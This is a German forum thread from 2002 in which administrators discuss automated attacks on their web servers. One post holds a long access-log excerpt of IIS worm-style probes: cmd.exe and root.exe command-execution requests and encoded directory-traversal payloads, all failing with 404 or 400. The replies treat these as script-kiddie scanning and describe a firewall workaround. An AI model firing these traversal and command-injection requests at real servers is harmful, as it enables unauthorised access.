Site Index - Feedback - Impressum |
| |||||||||
|
|
( Archiv ) | ( Neues Thema ) |
( Zeige die Threadübersicht ) | ( Zur Startübersicht ) |
02.04.2002 |
Was und wo: Analysierte Methoden, wie und welche Angriffe im Netz erfolgten (von: GA, 18:53:54) | ^ |
http://advice.networkice.com/advice/Intrusions/
Und jetzt werden einigen Administratoren die Knie weich? [ Leser: 85 ] |
Re: Was und wo: Analysierte Methoden, wie und welche Angriffe im Netz erfolgten (von: Trap11, 21:50:46) | |
Hier dier Ausschnitt aus einer log Datei eines realen Angriffs (da der Server auf *** läuft -jedenfalls nicht unter Windows- macht der Angriff keinen Sinn aber die Angreifer sind wohl zu blöde um das zu begreifen, denn derServer wird seit Tagen angegriffen):
192.35.240.103 - - [02/Apr/2002:04:34:08 -0500] "GET / HTTP/1.1" 200 902 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" 192.35.240.103 - - [02/Apr/2002:04:34:15 -0500] "GET /Movie1.swf HTTP/1.1" 200 77207 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" 193.195.130.13 - - [02/Apr/2002:04:35:43 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-" 193.195.130.13 - - [02/Apr/2002:04:35:46 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-" 193.195.130.13 - - [02/Apr/2002:04:35:46 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-" 193.195.130.13 - - [02/Apr/2002:04:35:47 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-" 193.195.130.13 - - [02/Apr/2002:04:35:47 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-" 193.195.130.13 - - [02/Apr/2002:04:35:48 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-" 193.195.130.13 - - [02/Apr/2002:04:35:48 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-" 193.195.130.13 - - [02/Apr/2002:04:35:48 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-" 193.195.130.13 - - [02/Apr/2002:04:35:49 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-" 193.195.130.13 - - [02/Apr/2002:04:35:49 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-" 193.195.130.13 - - [02/Apr/2002:04:35:49 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-" 193.195.130.13 - - [02/Apr/2002:04:35:49 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-" 193.195.130.13 - - [02/Apr/2002:04:35:50 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-" 193.195.130.13 - - [02/Apr/2002:04:35:50 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-" 193.195.130.13 - - [02/Apr/2002:04:35:50 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-" 193.195.130.13 - - [02/Apr/2002:04:35:50 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-" 211.196.100.93 - - [02/Apr/2002:04:36:15 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-" 211.196.100.93 - - [02/Apr/2002:04:36:15 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-" 211.196.100.93 - - [02/Apr/2002:04:36:17 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-" 211.196.100.93 - - [02/Apr/2002:04:36:17 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-" 211.196.100.93 - - [02/Apr/2002:04:36:18 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-" 211.196.100.93 - - [02/Apr/2002:04:36:18 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-" 211.196.100.93 - - [02/Apr/2002:04:36:19 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-" 211.196.100.93 - - [02/Apr/2002:04:36:19 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-" 211.196.100.93 - - [02/Apr/2002:04:36:19 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-" 211.196.100.93 - - [02/Apr/2002:04:36:20 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-" 211.196.100.93 - - [02/Apr/2002:04:36:20 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-" 211.196.100.93 - - [02/Apr/2002:04:36:21 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-" 211.196.100.93 - - [02/Apr/2002:04:36:21 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-" 211.196.100.93 - - [02/Apr/2002:04:36:22 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-" 211.196.100.93 - - [02/Apr/2002:04:36:22 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-" 211.196.100.93 - - [02/Apr/2002:04:36:23 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-" 61.136.108.254 - - [02/Apr/2002:04:36:25 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-" 61.136.108.254 - - [02/Apr/2002:04:36:26 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-" 61.136.108.254 - - [02/Apr/2002:04:36:27 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-" 61.136.108.254 - - [02/Apr/2002:04:36:29 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-" 61.136.108.254 - - [02/Apr/2002:04:36:30 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-" 61.136.108.254 - - [02/Apr/2002:04:36:32 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-" 61.136.108.254 - - [02/Apr/2002:04:36:33 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-" 61.136.108.254 - - [02/Apr/2002:04:36:34 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-" 61.136.108.254 - - [02/Apr/2002:04:36:35 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-" 61.136.108.254 - - [02/Apr/2002:04:36:37 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-" 61.136.108.254 - - [02/Apr/2002:04:36:38 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-" 61.136.108.254 - - [02/Apr/2002:04:36:39 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-" 61.136.108.254 - - [02/Apr/2002:04:36:41 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-" 61.136.108.254 - - [02/Apr/2002:04:36:42 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-" 61.136.108.254 - - [02/Apr/2002:04:36:43 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-" 61.136.108.254 - - [02/Apr/2002:04:36:45 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-" 61.171.28.243 - - [02/Apr/2002:04:43:52 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-" 61.171.28.243 - - [02/Apr/2002:04:43:53 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-" 61.171.28.243 - - [02/Apr/2002:04:43:54 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-" 61.171.28.243 - - [02/Apr/2002:04:43:55 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-" 61.171.28.243 - - [02/Apr/2002:04:43:57 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-" 61.171.28.243 - - [02/Apr/2002:04:43:58 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-" 61.171.28.243 - - [02/Apr/2002:04:43:59 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-" 61.171.28.243 - - [02/Apr/2002:04:44:01 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-" 61.171.28.243 - - [02/Apr/2002:04:44:02 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-" 61.171.28.243 - - [02/Apr/2002:04:44:03 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-" 61.171.28.243 - - [02/Apr/2002:04:44:05 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-" 61.171.28.243 - - [02/Apr/2002:04:44:06 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-" 61.171.28.243 - - [02/Apr/2002:04:44:07 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-" 61.171.28.243 - - [02/Apr/2002:04:44:08 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-" 61.171.28.243 - - [02/Apr/2002:04:44:10 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-" 61.171.28.243 - - [02/Apr/2002:04:44:11 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-" 213.229.46.2 - - [02/Apr/2002:04:44:56 -0500] "GET / HTTP/1.1" 200 902 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)" 213.229.46.2 - - [02/Apr/2002:04:44:57 -0500] "GET /Movie1.swf HTTP/1.1" 200 77207 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)" 165.121.116.141 - - [02/Apr/2002:04:48:32 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-" 165.121.116.141 - - [02/Apr/2002:04:48:35 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-" 165.121.116.141 - - [02/Apr/2002:04:48:39 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-" 165.121.116.141 - - [02/Apr/2002:04:48:41 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-" 24.157.228.172 - - [02/Apr/2002:04:49:28 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-" 24.157.228.172 - - [02/Apr/2002:04:49:28 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-" 24.157.228.172 - - [02/Apr/2002:04:49:28 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-" 24.157.228.172 - - [02/Apr/2002:04:49:28 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-" 24.157.228.172 - - [02/Apr/2002:04:49:29 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-" 24.157.228.172 - - [02/Apr/2002:04:49:29 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-" 24.157.228.172 - - [02/Apr/2002:04:49:29 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-" 24.157.228.172 - - [02/Apr/2002:04:49:29 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-" 24.157.228.172 - - [02/Apr/2002:04:49:29 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-" 24.157.228.172 - - [02/Apr/2002:04:49:29 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-" 24.157.228.172 - - [02/Apr/2002:04:49:29 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-" 24.157.228.172 - - [02/Apr/2002:04:49:29 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-" 24.157.228.172 - - [02/Apr/2002:04:49:29 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-" 24.157.228.172 - - [02/Apr/2002:04:49:29 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-" 24.157.228.172 - - [02/Apr/2002:04:49:30 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-" 24.157.228.172 - - [02/Apr/2002:04:49:30 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-" 210.219.219.194 - - [02/Apr/2002:04:51:04 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-" |
03.04.2002 |
Re: Was und wo: Analysierte Methoden, wie und welche Angriffe im Netz erfolgten (von: Ronny C., 09:12:28) | |
das sind fast immer irgendwelche automatisch laufenden skripte irgendwelcher sog. skript-kiddies, die alles durchprobieren. Ich habe einen Domino Go Webserver unter WSeB laufen -> ich kann dir megabyteweise solche Logs schicken. Ich habe keine richtige Lösung für diese Albernheiten efunden. Zumindest war bisher kein Angriff erfolgreich. :-)
Das Problem konnte ich lediglich umgehen, indem ich eine Firewall (eigentlich nur "die Minifassung" von TCP/IP 4.3) auch für Port 80 installiert habe. (Das funktioniert allerdings nicht, wenn du einen Webserver ins Internet stellen willst -> bei mir soll der Domino Go Webserver nur das Intranet bedienen). If Microsoft is the answer I want my problem back! |
( Zeige die Threadübersicht ) | [ Version zum Drucken ] | ( Zur Startübersicht ) |
|
Mit * markierte Felder müssen ausgefüllt werden ! |
|